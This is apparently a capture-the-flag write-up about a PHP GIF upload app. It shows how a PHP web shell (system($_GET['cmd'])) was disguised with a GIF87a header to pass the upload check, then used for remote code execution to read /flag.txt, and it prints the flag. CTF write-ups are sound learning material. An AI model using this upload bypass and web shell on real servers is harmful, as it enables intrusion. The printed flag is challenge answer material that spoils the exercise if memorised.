Description
I made a secure php web app where I can upload all my gifs. Some people on the internet told me to run it in a docker container just to protect it from my personal files, but who cares.
Approach
At first, I uplaoded a Gif fie which was uploaded successfully then I attempted to upload a basic PHP payload and got this error
from the error we can see that the files are stored at /uploads
.
As the server only permitted GIF files.I modified the payload by adding a GIF header, GIF87a;
.
GIF87a;
<?php
system($_GET['cmd'])
?>
And it worked we got remote code execution. We can now execute commands on the machine
we can find the flag at: /uploads/payload.php/?cmd=cat /flag.txt
Flag: bucket{1_h4t3_PHP}